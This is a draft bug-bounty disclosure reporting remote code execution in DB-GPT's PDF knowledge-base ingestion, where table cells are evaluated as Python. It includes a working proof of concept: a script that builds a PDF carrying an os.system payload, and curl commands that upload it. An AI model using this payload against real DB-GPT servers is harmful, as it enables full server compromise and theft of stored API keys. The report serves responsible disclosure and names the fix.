# DB-GPT — Remote Code Execution via Python Code Evaluation on PDF Table Content

## meta
platform: huntr
program: DB-GPT
asset: https://github.com/eosphoros-ai/DB-GPT
date: 2026-02-13
status: DRAFT

````
Repository URL: https://github.com/eosphoros-ai/DB-GPT
Package Manager: pip
Version Affected: 0.7.4 (latest)
Vulnerability Type: Code Injection
CVSS:
  - Attack Vector: Network
  - Attack Complexity: Low
  - Privileges Required: Low
  - User Interaction: None
  - Scope: Unchanged
  - Confidentiality: High
  - Integrity: High
  - Availability: High
Title: Remote Code Execution via dangerous code evaluation on PDF table content during knowledge base ingestion
Description:

# Description

The `PDFProcessor` class in `dbgpt-ext` uses Python's dangerous built-in code evaluation function to reconstruct table data extracted from uploaded PDF files. When a PDF is uploaded to the knowledge base, `pdfplumber` extracts table rows and stores each row as a string representation of a Python list via `str(row)` (line 447). Later, during the `_load()` method, these string representations are passed through dangerous dynamic code evaluation (lines 185, 188, 215, 218) to convert them back into list objects for markdown table formatting.

An attacker can craft a malicious PDF containing a table where cell values contain Python expressions. When this PDF is uploaded and processed by the knowledge base ingestion pipeline, the injected Python code is executed on the server with the full privileges of the DB-GPT process.

The root cause is using dynamic code evaluation instead of `ast.literal_eval()` to deserialize data derived from untrusted input (uploaded PDF files).

# Proof of Concept

1. Create a malicious PDF with a table containing a Python payload in a cell:

```python
# generate_malicious_pdf.py
from reportlab.lib.pagesizes import letter
from reportlab.platypus import SimpleDocTemplate, Table

doc = SimpleDocTemplate("exploit.pdf", pagesize=letter)
# Cell content triggers code execution when the string representation is dynamically evaluated
payload = "__import__('os').system('id > /tmp/pwned')"
table_data = [
    ["Name", "Value"],
    ["normal", payload],
]
elements = [Table(table_data)]
doc.build(elements)
```

2. Upload `exploit.pdf` to a DB-GPT knowledge base via the API or web UI:

```bash
curl -X POST http://localhost:5670/api/v2/serve/knowledge/spaces \
  -H "Content-Type: application/json" \
  -d '{"name":"exploit_space","vector_type":"Chroma","desc":"test"}'

curl -X POST http://localhost:5670/api/v2/serve/knowledge/documents/upload \
  -F "space_id=exploit_space" \
  -F "files=@exploit.pdf"
```

3. When DB-GPT processes the PDF for RAG ingestion, the dynamic code evaluation calls at lines 185/188/215/218 execute the injected Python code.

4. Verify: `cat /tmp/pwned` shows the output of `id`, confirming code execution.

**Impact**: This vulnerability is capable of achieving full Remote Code Execution on the DB-GPT server. An attacker who can upload a PDF to any knowledge base gains shell access with the privileges of the DB-GPT process. This can lead to complete server compromise, data exfiltration, lateral movement, and access to all connected databases and LLM API keys stored in the environment.

**Occurrences**:
- Permalink: https://github.com/eosphoros-ai/DB-GPT/blob/322792b9d25c872eff18403b03cc97292f8e3db9/packages/dbgpt-ext/src/dbgpt_ext/rag/knowledge/pdf.py#L185
  - Description: Dangerous dynamic evaluation of `temp_table[0]` — evaluates string representation of PDF table header row as Python code
- Permalink: https://github.com/eosphoros-ai/DB-GPT/blob/322792b9d25c872eff18403b03cc97292f8e3db9/packages/dbgpt-ext/src/dbgpt_ext/rag/knowledge/pdf.py#L188
  - Description: Dangerous dynamic evaluation of `entry` — evaluates string representation of each PDF table data row as Python code
- Permalink: https://github.com/eosphoros-ai/DB-GPT/blob/322792b9d25c872eff18403b03cc97292f8e3db9/packages/dbgpt-ext/src/dbgpt_ext/rag/knowledge/pdf.py#L215
  - Description: Duplicate occurrence for the "last table" handling block (header)
- Permalink: https://github.com/eosphoros-ai/DB-GPT/blob/322792b9d25c872eff18403b03cc97292f8e3db9/packages/dbgpt-ext/src/dbgpt_ext/rag/knowledge/pdf.py#L218
  - Description: Duplicate occurrence for the "last table" handling block (rows)
- Permalink: https://github.com/eosphoros-ai/DB-GPT/blob/322792b9d25c872eff18403b03cc97292f8e3db9/packages/dbgpt-ext/src/dbgpt_ext/rag/knowledge/pdf.py#L442-L448
  - Description: `str(row)` stores table row as string — the source of data later passed to dangerous dynamic evaluation

**References**:
- https://cwe.mitre.org/data/definitions/95.html — CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code
- https://docs.python.org/3/library/ast.html#ast.literal_eval — Python docs recommending ast.literal_eval() as safe alternative
- https://owasp.org/www-community/attacks/Code_Injection — OWASP Code Injection
````